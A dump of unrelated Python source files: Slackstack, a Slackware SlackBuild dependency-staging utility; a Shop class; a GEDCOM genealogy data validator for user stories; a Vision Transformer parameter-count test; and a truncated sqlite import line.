content stringlengths 5 1.05M |
|---|
#!/bin/env python3
# MIT License
# Copyright (c) 2019-2022 Andrew Payne
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# 79 spaces-------------------------------------------------------------------|
import glob
import os
import shutil
import stat
import subprocess
import sys
import time
# Software Data:
soft_name = "Slackstack"
soft_tag = "a slackbuild utility"
# Version
soft_vers = "0.10.6"
# set home directory
path = "~"
home = os.path.expanduser(path)
# lists and dictionaries
installed_dict = {}
sbo_categories = []
sbo_paths = {}
sbo_app_list = []
sbo_ver_list = []
sbo_av_dict = {}
deps_added_list = []
deps_checked_list = []
index_dict = {}
installseq_list = []
# This is where we set the path for personal repos, paths here get priority
# First priority
dir_dev = os.path.join(home, "slackware", "dev_slack", "")
# Second priority
dir_dbs = os.path.join(home, "slackware", "dbs_slackware", "")
# This is where the local slackbuilds git repo is stored
dir_sbo = os.path.join(home, "slackstack", "slackbuilds", "")
# This is the path where slackstack assembles the builds
dir_bld = os.path.join(home, "slackstack", "")
# This is the git repo to use for sbo
sbo_git = "https://gitlab.com/SlackBuilds.org/slackbuilds.git"
def hello_func():
    """Clear the terminal and print the program's welcome banner."""
    os.system("clear")
    banner = ("Welcome to " + soft_name + " version " + soft_vers
              + ", " + soft_tag + ".")
    print("\n" + banner)
    print("")
def make_slackstack_dir_func():
    """Create the local slackbuilds repo directory (and parents) if absent.

    Uses os.makedirs(exist_ok=True) instead of shelling out to `mkdir -p`;
    same effect, no subprocess.
    """
    os.makedirs(dir_sbo, exist_ok=True)
def dir_sbo_git_update_func():
    # Refresh the local SlackBuilds.org mirror: pull if a clone already
    # exists under dir_sbo, otherwise clone the repo fresh.
    print("Updating git")
    if os.path.isdir(dir_sbo + ".git"):
        subprocess.call(["git", "-C", dir_sbo, "pull"])
    else:
        subprocess.call(["git", "clone", sbo_git, dir_sbo])
    # brief pause so the git output is readable before the next screen clear
    time.sleep(1)
# build dictionary of local apps and libraries--------------------------------|
def build_dict_local_apps():
    """Populate and return installed_dict: {package name: version string}.

    Scans /var/log/packages (the Slackware package database), whose entries
    are named name-version-arch-build[_tag], then folds in /usr/bin
    executables and /usr/lib64 libraries so dependency checks can see them.
    """
    for entry in os.listdir("/var/log/packages/"):
        parts = entry.split("-")
        build = parts[-1].strip()
        # The package name may itself contain hyphens: everything before
        # the trailing version-arch-build triplet is the name.  (The
        # original branched on len(parts) in {5, 6, 7} and silently
        # truncated longer names to parts[0]; joining parts[:-3] handles
        # any number of hyphens.)
        name = "-".join(parts[:-3]) or parts[0]
        if len(parts[-1]) > 3:
            # a build field longer than 3 chars carries a repo tag (_SBo…)
            version = parts[-3] + " (" + build + ")"
        else:
            # no tag means it's in the base system
            version = parts[-3]
        installed_dict.update({name: version})
    for item in os.listdir("/usr/bin/"):
        if not installed_dict.get(str(item)):
            installed_dict.update({item: "(version_unknown)"})
    # checking installed libraries may be overkill for most purposes
    # comment out if not needed
    for item in os.listdir("/usr/lib64"):
        if item[0:3] == "lib":
            libname = item[3:].split(".")[0]
        else:
            # The original reused the previous iteration's name here (a
            # stale-variable bug that made this branch a no-op); use the
            # file's own stem instead.
            libname = item.split(".")[0]
        if not installed_dict.get(str(libname)):
            installed_dict.update({libname: "(system library)"})
    return installed_dict
# build dictionary of remote apps and libraries-------------------------------|
def build_dict_remote_apps():
    """Return {program_name: version} for every SlackBuild available locally.

    Category directories are collected in priority order (personal dev repo,
    dbs repo, then the SlackBuilds.org clone); the first repo providing a
    given build wins because sbo_paths is only updated for unseen names.
    Versions are parsed from each build's .info file.
    """
    # Local accumulators: the original appended to module-level lists, so a
    # second call produced duplicated (mis-zipped) entries.
    app_list = []
    ver_list = []
    for folder in glob.glob(dir_dev):
        if os.path.isdir(folder) and folder not in sbo_categories:
            sbo_categories.append(folder)
    for folder in glob.glob(dir_dbs):
        if os.path.isdir(folder) and folder not in sbo_categories:
            sbo_categories.append(folder)
    for folder in glob.glob(dir_sbo + "*"):
        if os.path.isdir(folder) and folder not in sbo_categories:
            sbo_categories.append(folder)
    for folder in sbo_categories:
        for path in os.listdir(folder):
            if not sbo_paths.get(str(path)) \
                    and os.path.isdir(folder + "/" + path) \
                    and path != ".git":
                sbo_paths.update({path: folder})
    for path, folder in sbo_paths.items():
        with open(os.path.join(folder, path, path + ".info"), "r") as f:
            for line in f.readlines():
                if "PRGNAM=" in line:
                    app_list.append(line.strip().split("=")[1].replace('"', ''))
                if "VERSION=" in line:
                    ver_list.append(line.strip().split('=')[1].replace('"', ''))
    return dict(zip(app_list, ver_list))
def check_available_builds(app):
    """Print the available SlackBuild version of *app*; exit if not found."""
    for name, version in build_dict_remote_apps().items():
        if name == app:
            print("Available version:", name, version)
            break
    else:
        # no repo provides this build -- nothing further can be done
        print(app, "SlackBuild not found \n")
        exit()
def check_installed_builds(app):
    """Print the locally installed version of *app*, or NONE if absent."""
    for name, version in build_dict_local_apps().items():
        if name == app:
            print("Installed version:", name, version, "\n")
            break
    else:
        print("Installed version:", "NONE", "\n")
def clean_tree():
    """Remove any leftover *-tree staging directory from a previous run."""
    staging_root = os.path.join(home, "slackstack")
    matches = glob.glob(os.path.join(staging_root, "*-tree", ""))
    if matches:
        shutil.rmtree(os.path.join(matches[0]))
def copy_slackbuild_dirs_to_tree(app):
    # Copy the SlackBuild directory for *app* from its source repo into the
    # per-build staging tree "<app_0>-tree" under ~/slackstack.
    # NOTE(review): relies on the module globals sbo_paths, home and app_0
    # (the top-level app entered by the user) being populated first, and
    # shutil.copytree raises if the destination already exists.
    remote_path = (os.path.join(sbo_paths[str(app)],app))
    local_path = (os.path.join(home,"slackstack",app_0+"-tree"+"/",app+"/"))
    print("Copying", app, "to", local_path, "\n")
    shutil.copytree(remote_path,local_path)
def check_for_dependencies():
    # Scan builds already staged in "<app_0>-tree" for a REQUIRES= line in
    # their .info files and stage each newly-discovered dependency (one
    # level per call; the caller loops to reach transitive dependencies).
    # NOTE(review): accumulates state across calls in the module globals
    # deps_checked_list, deps_added_list and index_dict; only the .info of
    # the LAST unchecked item survives into `lines` below.
    lines = []
    local_path = (os.path.join(home,"slackstack",app_0+"-tree"+"/"))
    for item in os.listdir(local_path):
        if item not in deps_checked_list:
            deps_checked_list.append(item)
            with open(local_path+item+"/"+item+".info", "r") as f:
                lines = f.readlines()
        else:
            continue
    for line in lines:
        # len(line) > 12 skips empty REQUIRES="" entries
        if "REQUIRES" in line and len(line) > 12:
            line = line.replace("REQUIRES=","").replace('"','').strip()
            line = line.split(" ")
            for dep in line:
                deps_added_list.append(dep)
                # index_dict doubles as the "already staged" set
                if dep not in index_dict.values():
                    counter = (len(deps_added_list))
                    print(counter)
                    index_dict.update({counter:dep})
                    check_available_builds(dep)
                    check_installed_builds(dep)
                    copy_slackbuild_dirs_to_tree(dep)
def iterate_for_permissions_func():
    """Mark every staged *.SlackBuild script as owner-executable."""
    for script in glob.glob(dir_bld + "*tree/*/*"):
        if "SlackBuild" in script:
            mode = os.stat(script).st_mode
            os.chmod(script, mode | stat.S_IEXEC)
def create_install_list_func():
    """Write installseq.txt describing the order in which to install builds.

    Entries are numbered in reverse discovery order (deepest dependency
    gets the lowest number) and padded so the version column lines up.
    """
    # Build both dictionaries once up front; the original re-ran the full
    # filesystem scans for every dependency inside the loop.
    local_apps = build_dict_local_apps()
    remote_apps = build_dict_remote_apps()
    n = len(index_dict) + 1
    # widest dependency name, used to column-align the version field
    width = max((len(i) for i in deps_added_list), default=0)
    for i in deps_added_list:
        pad = (width + 2) - len(i)
        if i in local_apps:
            installseq_list.append(
                str(n) + " "*2 + i + " "*pad + local_apps.get(i)
                + "\t" + "INSTALLED" + "\n\n"
            )
            n -= 1
            installseq_list.append(
                i + " " + remote_apps.get(i)
                + " will replace:\n")
        else:
            installseq_list.append(
                str(n) + " "*2 + i + " "*pad + "not installed" + "\n")
            n -= 1
    file_loc = glob.glob(dir_bld + "*tree")
    with open(os.path.join(file_loc[0], "installseq.txt"), "w") as f:
        f.write("Install order:\n")
        for entry in reversed(installseq_list):
            f.write(entry)
    # the original ended with a dangling `f.close` (no parens, and
    # redundant inside `with`); it has been dropped
# Let's get started: interactive top-level flow.
hello_func()
make_slackstack_dir_func()
dir_sbo_git_update_func()
hello_func()
build_dict_remote_apps()
build_dict_local_apps()
print("What app are we building?")
app_0 = input("---> ")
print("")
deps_added_list.append(app_0)
app = app_0
check_available_builds(app)
check_installed_builds(app)
clean_tree()
copy_slackbuild_dirs_to_tree(app)
print("\nDependencies:\n")
y = 1
# run the one-level dependency scan repeatedly so transitive dependencies
# (up to 9 levels deep) get pulled into the staging tree as well
for y in range (1, 10):
    check_for_dependencies()
iterate_for_permissions_func()
if len(deps_added_list) == 1:
    print("None!\n")
else:
    pass
create_install_list_func()
grab_y_n = input("Run slackgrab.py to get the tarballs (y/n)? ")
if grab_y_n == "Y" or grab_y_n == "y":
    # run the companion downloader from the directory this script lives in
    subprocess.run(["slackgrab.py", "--skip"], cwd=sys.path[0])
else:
    pass
exit()
|
# -*- coding: utf-8 -*-
class Shop(object):
    """A shop at a geographic location, carrying a list of search tags."""

    def __init__(self, id, name, lat, lng, tags=None):
        self.id = id
        self.name = name
        self.lat = lat
        self.lng = lng
        # tags should have relation to product not shop
        # since the search is product-based
        self.tags = [] if tags is None else tags

    def add_tag(self, tag):
        """Append one tag to this shop's tag list."""
        self.tags.append(tag)
|
import model
from datetime import datetime
import dateutil
from datetime import date
from unittest import TestCase
from dateutil.relativedelta import relativedelta
# uids collected from reported errors (shared by the checks below)
error_locations = []
def error_dealer(storyType, definition, location):
    """Print one formatted error line for a user-story violation."""
    if isinstance(location, list):
        location = ','.join(location)
    print('Error: "{}" {}.Index: {}'.format(storyType, definition, location))
# US02 - Birth should occur before marriage of that individual
def birth_before_marriage(individuals, families):
    """Check US02: each spouse must be born before the family's marriage.

    Returns True when no violation is found, False otherwise; each
    violation is reported through report_error.
    """
    return_status = True
    error_type = "US02"
    for family in families:
        if family.marriage:
            husband = None
            wife = None
            for indiv in individuals:
                if indiv.uid == family.husband:
                    husband = indiv
                if indiv.uid == family.wife:
                    wife = indiv
            # guard against a missing spouse record: the original raised
            # AttributeError when husband/wife stayed None
            if husband and husband.birthday and husband.birthday > family.marriage:
                # typo "marraige" fixed in the report text
                report_error(error_type, "Birth of husband occurs after marriage", [husband.uid])
                return_status = False
            if wife and wife.birthday and wife.birthday > family.marriage:
                report_error(error_type, "Birth of wife occurs after marriage", [wife.uid])
                return_status = False
    return return_status
#US03 - Birth should occur before death of an individual.
def birth_before_death(individuals):
    """Check US03: nobody may die before being born.

    Returns True when no violation is found; violations are reported
    through report_error with the individual's uid.
    """
    return_status = True
    for individual in individuals:
        if individual.deathDate and individual.birthday:
            if individual.deathDate < individual.birthday:
                # message fixed: the violation is death occurring BEFORE
                # birth (the original message described the valid case)
                report_error("US03", "Death occurs before birth.", [individual.uid])
                return_status = False
    return return_status
#------User Story 5-----------------------------
def marriage_before_death(individuals, families):
    """Check US05: marriage must occur before the death of either spouse.

    Returns True when no violation is found; violations go to error_dealer.
    """
    allOk = True
    story_number = "US05"
    for family in families:
        if family.marriage:
            husband = None
            wife = None
            for indiv in individuals:
                if indiv.uid == family.husband:
                    husband = indiv
                if indiv.uid == family.wife:
                    wife = indiv
            # deathDate guard added: alive == False with a missing death
            # date crashed the comparison in the original
            if wife is not None and wife.alive == False and wife.deathDate:
                # fixed: the original tested marriage < deathDate, which
                # flagged the VALID case (married before dying)
                if wife.deathDate < family.marriage:
                    allOk = False
                    error_descrip = "Death of Wife occured before marriage"
                    error_location = [wife.uid]
                    error_dealer(story_number, error_descrip, error_location)
            if husband is not None and husband.alive == False and husband.deathDate:
                if husband.deathDate < family.marriage:
                    allOk = False
                    error_descrip = "Death of Husband occured before marriage"
                    error_location = [husband.uid]
                    error_dealer(story_number, error_descrip, error_location)
    return allOk
#------User Story 8--------------------------
def birth_before_parents_marry(indi, families):
    """Check US08: children must be born after their parents' marriage and
    no later than 9 months after a divorce.

    Returns True when no violation is found; violations go to error_dealer.
    """
    story_number = "US08"  # was mislabelled "US09" despite the US08 header
    allOk = True
    for fam in families:
        if fam.children:
            for child in fam.children:
                for person in indi:
                    if person.uid == child and person.birthday:
                        if fam.marriage and person.birthday < fam.marriage:
                            allOk = False
                            error_dealer(story_number, "A child is born before their parent's marriage", [fam.uid, person.uid])
                        # fixed: compare against the DIVORCE date plus nine
                        # months; the original compared against today + 9
                        # months, which no real birthday can exceed
                        if fam.divorce and person.birthday > fam.divorce + relativedelta(months=9):
                            allOk = False
                            error_dealer(story_number, "A child is after 9 months of their parents divorce", [fam.uid, person.uid])
    return allOk
# if fam.marriage > :
# (indi, families) = model.main()
# birth_before_parents_marry(indi, families)
#User Story 7
def less_than_150_years_old(individuals):
    """Check US07: no individual may live (or have lived) 150+ years."""
    allOk = True
    story_number = "US07"
    for individual in individuals:
        if individual.birthday is None:
            continue
        if individual.deathDate:
            # deceased: lifespan measured birth -> death
            if individual.deathDate > individual.birthday + relativedelta(years=150):
                allOk = False
                error_dealer(story_number,
                             "Individual was older than 150 years old",
                             [individual.uid])
        elif ((date.today() - individual.birthday).days / 365) >= 150:
            # still alive: age measured birth -> today
            allOk = False
            error_dealer(story_number,
                         "Individual is older than 150 years old",
                         [individual.uid])
    return allOk
#User Story 10
def marriage_after_14(individuals, families):
    """Check US10: both spouses must be at least 14 at the marriage date."""
    story_number = "US10"
    allOk = True
    for family in families:
        if family.marriage:
            husband = None
            wife = None
            for indiv in individuals:
                if indiv.uid == family.husband:
                    husband = indiv
                if indiv.uid == family.wife:
                    wife = indiv
            # fixed: the original computed (birthday - marriage), which is
            # negative for anyone born before their own marriage, so the
            # check could never fire for real data; age at marriage is
            # (marriage - birthday).  None guards added for missing records.
            if wife and wife.birthday and (family.marriage - wife.birthday).days / 365 < 14:
                allOk = False
                error_dealer(story_number, "Wife married before age 14", [wife.uid])
            if husband and husband.birthday and (family.marriage - husband.birthday).days / 365 < 14:
                allOk = False
                error_dealer(story_number, "Husband married before age 14", [husband.uid])
    return allOk
################## Sprint 2 ##################
#------User Story 6-----------------------------
def divorce_before_death(individuals, families):
    """Check US06: a divorce cannot occur after either spouse's death."""
    allOk = True
    story_number = "US06"
    for family in families:
        if family.marriage and family.divorce:
            husband = None
            wife = None
            for indiv in individuals:
                if indiv.uid == family.husband:
                    husband = indiv
                if indiv.uid == family.wife:
                    wife = indiv
            # guards added: a missing spouse record or alive == False with
            # no recorded deathDate crashed the original comparisons
            if wife and wife.alive == False and wife.deathDate:
                if family.divorce > wife.deathDate:
                    allOk = False
                    error_descrip = "Divorce occurred after death of wife"
                    error_location = [wife.uid]
                    error_dealer(story_number, error_descrip, error_location)
            if husband and husband.alive == False and husband.deathDate:
                if husband.deathDate < family.divorce:
                    allOk = False
                    error_descrip = "Divorce occurred after death of husband"
                    error_location = [husband.uid]
                    error_dealer(story_number, error_descrip, error_location)
    return allOk
#------User Story 9--------------------------
def birth_before_parents_death(individuals, families):
    """Check US09: a child must be born before the mother's death and no
    more than 9 months after the father's death.

    NOTE(review): like the original, families where either parent has no
    recorded deathDate (e.g. still alive) are skipped entirely — confirm
    that is the intended scope.
    """
    story_number = "US09"
    allOk = True
    for fam in families:
        husband = None
        wife = None
        for indiv in individuals:
            if indiv.uid == fam.husband:
                husband = indiv
            if indiv.uid == fam.wife:
                wife = indiv
        # guards added: the original crashed on a missing husband record
        # (None.deathDate) and skipped None-checking wife.deathDate
        if not fam.children or husband is None or wife is None:
            continue
        if not (fam.marriage and wife.deathDate and husband.deathDate):
            continue
        # latest allowed birth relative to the father's death; the original
        # round-tripped the date through strftime/strptime for no reason
        father_limit = husband.deathDate + relativedelta(months=9)
        for child in fam.children:
            for person in individuals:
                if person.uid == child:
                    if person.birthday > wife.deathDate:
                        allOk = False
                        error_dealer(story_number, "A child is born after mother's death", [fam.uid, person.uid])
                    if person.birthday > father_limit:
                        allOk = False
                        error_dealer(story_number, "A child is born after father's death", [fam.uid, person.uid])
    return allOk
#US01 - Dates Before Current Date
def dateBeforeToday(individuals, families):
    """Check US01: birth, death, marriage and divorce dates must not lie
    in the future relative to today."""
    allOk = True
    story_number = "US01"
    today = date.today()
    for indi in individuals:
        if indi.birthday is not None and indi.birthday > today:
            allOk = False
            error_dealer(story_number, "Birthdate in future", [indi.uid])
        if indi.deathDate is not None and indi.deathDate > today:
            allOk = False
            error_dealer(story_number, "Deathdate in future", [indi.uid])
    for fam in families:
        if fam.marriage is not None and fam.marriage > today:
            allOk = False
            error_dealer(story_number, "Marriage Date in future", [fam.uid])
        if fam.divorce is not None and fam.divorce > today:
            allOk = False
            error_dealer(story_number, "Divorce date in future", [fam.uid])
    return allOk
#US04 - Marriage before Divorce
def marriageBeforeDivorce(individuals, families):
    """Check US04: a family's divorce date may not precede its marriage."""
    allOk = True
    story_number = "US04"
    for fam in families:
        has_both = fam.marriage is not None and fam.divorce is not None
        if has_both and fam.divorce < fam.marriage:
            allOk = False
            error_dealer(story_number, "Divorced before marriage", [fam.uid])
    return allOk
# report Error to the console
def report_error(error_type, description, locations):
    """Print one formatted error row and record the offending uids.

    *locations* may be a list of uids or a pre-joined string.
    """
    if isinstance(locations, list):
        # record the uids BEFORE flattening for display; the original
        # extended with the joined string (adding single characters) and
        # did so twice, duplicating every entry
        error_locations.extend(locations)
        locations = ','.join(locations)
    else:
        error_locations.append(locations)
    estr = '{:14.14s} {:50.50s} {:10.10s}' \
        .format(error_type, description, locations)
    print(estr)
#User Story 17
def no_marriages_to_descendants(individuals, families):
    # US17: nobody should marry one of their own descendants.
    # NOTE(review): this implementation looks broken and should be reworked
    # against the data model before being trusted:
    #   - childOf/spouseOf are scalars overwritten on every individual, so
    #     only the LAST individual's famc/fams survive the first loop;
    #   - `fam in childOf` compares a family object against a famc value;
    #   - fam.husband / fam.wife appear to be uids elsewhere in this file,
    #     so `.uid` below would raise AttributeError.
    # Left untouched pending that rework.
    allOk = True
    story_number = "US17"
    childOf = None
    spouseOf = None
    for individual in individuals:
        if individual.famc:
            childOf = individual.famc
        if individual.fams:
            spouseOf = individual.fams
    for fam in families:
        if fam in childOf:
            if fam.husband in spouseOf:
                allOk = False
                error_descrip = "Husband married descendants"
                error_location = [fam.husband.uid]
                error_dealer(story_number, error_descrip, error_location)
            if fam.wife in spouseOf:
                allOk = False
                error_descrip = "Wife married descendants"
                error_location = [fam.wife.uid]
                error_dealer(story_number, error_descrip, error_location)
    return allOk
#User Story 18
def siblings_should_not_marry(individuals, families):
    # US18: siblings must not marry each other.
    # NOTE(review): the core test is broken — `child` is a uid (string), so
    # `child.marriage` would raise AttributeError, and
    # `child.marriage == child.marriage` is trivially True.  A correct
    # check must compare the matched person's spouse family against the
    # sibling set; left untouched pending that rework.
    allOk = True
    story_number = "US18"
    for fam in families:
        if fam.children:
            None
            for child in fam.children:
                for person in individuals:
                    if person.uid == child:
                        if child.marriage:
                            if child.marriage == child.marriage:
                                allOk = False
                                error_dealer(story_number, "Child married a sibling",[fam.uid, person.uid])
    return allOk
#User Story 21
def correct_gender_for_role(individuals, families):
    """Check US21: the husband role must be male and the wife role female.

    Returns True when no violation is found; violations go to error_dealer.
    """
    allOk = True
    story_number = "US21"
    for family in families:
        if family.marriage:
            for indiv in individuals:
                if indiv.uid == family.husband and indiv.sex == "F":
                    allOk = False
                    error_dealer(story_number,
                                 "Husband gender is not Male",
                                 [indiv.uid])
                if indiv.uid == family.wife and indiv.sex == "M":
                    allOk = False
                    # fixed: report the wife's uid — the original reported
                    # the husband's uid for a wife-gender violation
                    error_dealer(story_number,
                                 "Wife gender is not Female",
                                 [indiv.uid])
    return allOk
#User Story 15
def fewer_than_15_siblings(individuals, families):
    """Check US15: every family must have fewer than 15 children."""
    allOk = True
    story_number = "US15"
    for family in families:
        if family.children and len(family.children) >= 15:
            allOk = False
            error_dealer(story_number, "more than 15 siblings", [family.uid])
    return allOk
#-----------------USER STORY 11------------
def no_bigamy(individuals,families):
    # US11: marriage should not occur during marriage to another spouse.
    # For each married family, scan for a LATER-starting family sharing
    # exactly one spouse whose marriage begins before this one ended
    # (by divorce, or by the other spouse's death when never divorced).
    # NOTE(review): husband/wife may be unbound if the uid lookup finds no
    # match, and each conflicting pair is reported once, from the side of
    # the earlier marriage (fam.marriage < fam2.marriage).
    allOk = True
    story_number = "US11"
    for fam in families:
        if fam.marriage:
            for indi in individuals:
                if indi.uid == fam.husband:
                    husband = indi
                elif indi.uid == fam.wife:
                    wife = indi
            for fam2 in families:
                if fam2.marriage is not None:
                    if fam.marriage < fam2.marriage:
                        if fam2.husband == husband.uid and not fam2.wife == wife.uid and ((fam.divorce is not None and fam2.marriage < fam.divorce) or (fam.divorce is None and (wife.deathDate is None or fam2.marriage < wife.deathDate))):
                            allOk = False
                            error_descrip = "Husband remarried before end of his other marriage"
                            error_location = [husband.uid]
                            error_dealer(story_number, error_descrip, error_location)
                        elif fam2.wife == wife.uid and not fam2.husband == husband.uid and ((fam.divorce is not None and fam2.marriage < fam.divorce) or (fam.divorce is None and (husband.deathDate is None or fam2.marriage < husband.deathDate))):
                            allOk = False
                            error_descrip = "Wife remarried before end of her other marriage"
                            error_location = [wife.uid]
                            error_dealer(story_number, error_descrip, error_location)
    return allOk
#-----------------USER STORY 12-------------------
def parents_not_too_old(individuals,families):
    """Check US12: a father should be less than 80 years, and a mother less
    than 60 years, older than each of their children."""
    allOk = True
    story_number = "US12"
    for fam in families:
        # guards added throughout: the original crashed when a parent
        # record was missing (h_indi/w_indi unbound), fam.children was
        # None, or a birthday was None
        h_indi = None
        w_indi = None
        for indi in individuals:
            if indi.uid == fam.husband:
                h_indi = indi
            if indi.uid == fam.wife:
                w_indi = indi
        if not fam.children:
            continue
        for indi1 in individuals:
            if indi1.uid in fam.children and indi1.birthday is not None:
                if h_indi is not None and h_indi.birthday is not None and indi1.birthday > h_indi.birthday + relativedelta(years=80):
                    allOk = False
                    error_descrip = "Child born after 80 years of father's age"
                    error_location = [indi1.uid]
                    error_dealer(story_number, error_descrip, error_location)
                if w_indi is not None and w_indi.birthday is not None and indi1.birthday > w_indi.birthday + relativedelta(years=60):
                    allOk = False
                    error_descrip = "Child born after 60 years of mother's age"
                    error_location = [indi1.uid]
                    error_dealer(story_number, error_descrip, error_location)
    return allOk
#US29 - List deceased
def list_deceased_name(individuals,families):
    """US29: print the name of every deceased individual.

    Always returns True (listing stories do not fail); prints a notice via
    report_error when no deceased individual exists.
    """
    return_status = True
    count = 0
    print("****************List deceased******************")
    for individual in individuals:
        # fixed: the original listed LIVING people (`if individual.alive`)
        if not individual.alive:
            count = count + 1
            print(individual.name)
    if count == 0:
        # pass no uid: `individual` is unbound when the input list is
        # empty (the original crashed with NameError there)
        report_error("US29", "No death found.", [])
    return return_status
#US30 - List live married
def list_live_married_name(individuals,families):
    """US30: print the name of every living, married individual.

    Always returns True; prints a notice via report_error when nobody
    matches.
    """
    return_status = True
    count = 0
    print("****************List live married******************")
    for family in families:
        if family.marriage:
            for indi in individuals:
                if indi.uid == family.husband and indi.alive:
                    print(indi.name)
                    count = count + 1
                if indi.uid == family.wife and indi.alive:
                    print(indi.name)
                    count = count + 1
    if count == 0:
        # fixed: the original passed `individuals.uid` — the list has no
        # .uid attribute, so this branch raised AttributeError
        report_error("US30", "No live married found.", [])
    return return_status
#US21 - husband male and wife should be female
def correct_gender(individuals,families):
    """US21 (console variant): husbands must be male and wives female.

    Returns False when any role has the wrong sex.  All families and
    individuals are now checked — the original returned unconditionally
    after inspecting the first matching individual, skipping the rest.
    """
    return_status = True
    print("****************check correct gender******************")
    for family in families:
        for indi in individuals:
            if indi.uid == family.husband and indi.sex != "M":
                report_error("US21", "husband not male", [indi.uid])
                return_status = False
            if indi.uid == family.wife and indi.sex != "F":
                report_error("US21", "wife not female.", [indi.uid])
                return_status = False
    return return_status
#US27 - list ages of all individuals
def list_indi_age(individuals,families):
    """US27: print each individual's name and current age in whole years.

    Returns False only when no individual with a birthday exists.
    """
    return_status = True
    count = 0
    print("****************list_indi_age******************")
    today = datetime.utcnow().date()
    for individual in individuals:
        if individual.birthday:
            # age in whole years; the original round-tripped the date
            # through strftime/strptime for no reason
            age = relativedelta(today, individual.birthday).years
            print(individual.name)
            print(age)
            count = count + 1
    if count == 0:
        # fixed: duplicated word in the message, and `individual` is
        # unbound when the input list is empty
        report_error("US27", "No individual found.", [])
        return_status = False
    return return_status
#User Story 31
def list_live_single_name(individuals,families):
    # US31: list living people over 30 who have never been married.
    # NOTE(review): the nested loops re-examine every individual once PER
    # FAMILY, so unmarried names are printed multiple times and `count`
    # counts married people rather than singles; `individual` is also
    # unbound in the report_error call when the input is empty.  The logic
    # needs a rework (collect married uids first, then scan individuals
    # once); left untouched pending that.
    return_status = True
    count = 0
    print("Living single over 30 never married")
    for family in families:
        for individual in individuals:
            if individual.birthday:
                orgDate = individual.birthday.strftime("%Y-%m-%d")
                date_format = '%Y-%m-%d'
                dtObj = datetime.strptime(orgDate, date_format)
                now = datetime.utcnow()
                now = now.date()
                age = dateutil.relativedelta.relativedelta(now, dtObj)
                age = age.years
                if 30 < age:
                    if individual.uid == family.husband or individual.uid == family.wife:
                        count = count + 1
                    else:
                        print(individual.name)
    if count == 0:
        report_error("US30", "no single living people over the age of 30 that have never been married.", [individual.uid])
        return_status = True
    return return_status
#User Story 35
def list_recent_births(individuals):
    """US35: return names of individuals born within the last 30 days."""
    recent = []
    for indi in individuals:
        born = indi.birthday
        # birth date within 30 days of today (renamed the accumulator,
        # which previously shadowed the builtin `list`)
        if born and born + relativedelta(days=30) >= date.today():
            recent.append(indi.name)
    return recent
#User Story 36
def list_recent_deaths(individuals):
    """US36: return names of individuals who died within the last 30 days."""
    recent = []
    for indi in individuals:
        died = indi.deathDate
        # death date within 30 days of today (renamed the accumulator,
        # which previously shadowed the builtin `list`)
        if died and died + relativedelta(days=30) >= date.today():
            recent.append(indi.name)
    return recent
#User Story 38
def list_upcoming_birthdays(individuals):
    """US38: return names of individuals whose next birthday falls within
    the next 30 days (today inclusive).

    Fixed: the original compared the literal birth DATE against today
    (`birthday + 30 days <= today`), which matched everyone born more than
    30 days ago.  An upcoming birthday is this year's (or next year's)
    anniversary of the birth date.
    """
    from datetime import timedelta
    names = []
    today = date.today()
    horizon = today + timedelta(days=30)
    for indi in individuals:
        if not indi.birthday:
            continue
        for year in (today.year, today.year + 1):
            try:
                anniversary = indi.birthday.replace(year=year)
            except ValueError:
                # Feb 29 birthday in a non-leap year -> celebrate Feb 28
                anniversary = indi.birthday.replace(year=year, day=28)
            if today <= anniversary <= horizon:
                names.append(indi.name)
                break
    return names
# Script entry point: load the GEDCOM data through the model module, then
# report deaths from the last 30 days.
(individuals, families) = model.main()
print(list_recent_deaths(individuals))
# Copyright 2021 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from absl.testing import absltest
from absl.testing import parameterized
import jax
import jax.numpy as jnp
from vit_jax import models
from vit_jax.configs import models as config_lib
# Expected trainable-parameter count per published model configuration;
# ModelsTest below instantiates each config and checks its actual count
# against these values.
MODEL_SIZES = {
    'ViT-B_16': 86_567_656,
    'R50+ViT-B_16': 98_659_112,
    'ViT-B_32': 88_224_232,
    'R26+ViT-B_32': 101_383_976,
    'ViT-L_16': 304_326_632,
    'ViT-L_32': 306_535_400,
    'R50+ViT-L_32': 328_994_856,
    'ViT-H_14': 632_045_800,
    'Mixer-B_16': 59_880_472,
    'Mixer-L_16': 208_196_168,
}
class ModelsTest(parameterized.TestCase):
  """Instantiation smoke test for every published model configuration."""

  @parameterized.parameters(*list(MODEL_SIZES.items()))
  def test_can_instantiate(self, name, size):
    """Builds `name`, runs one forward pass, and checks the param count."""
    rng = jax.random.PRNGKey(0)
    config = config_lib.MODEL_CONFIGS[name]
    # Mixer configs have no 'ViT' in the name; everything else (including
    # the ResNet hybrids) is handled by VisionTransformer.
    model_cls = models.VisionTransformer if 'ViT' in name else models.MlpMixer
    model = model_cls(num_classes=1_000, **config)
    inputs = jnp.ones([2, 224, 224, 3], jnp.float32)
    variables = model.init(rng, inputs, train=False)
    outputs = model.apply(variables, inputs, train=False)
    self.assertEqual((2, 1000), outputs.shape)
    # total parameter count across the flattened variable tree
    param_count = sum(p.size for p in jax.tree_flatten(variables)[0])
    self.assertEqual(
        size, param_count,
        f'Expected {name} to have {size} params, found {param_count}.')
if __name__ == '__main__':
  absltest.main()
|
import sqlite3
# Default path to the case-law SQLite database.
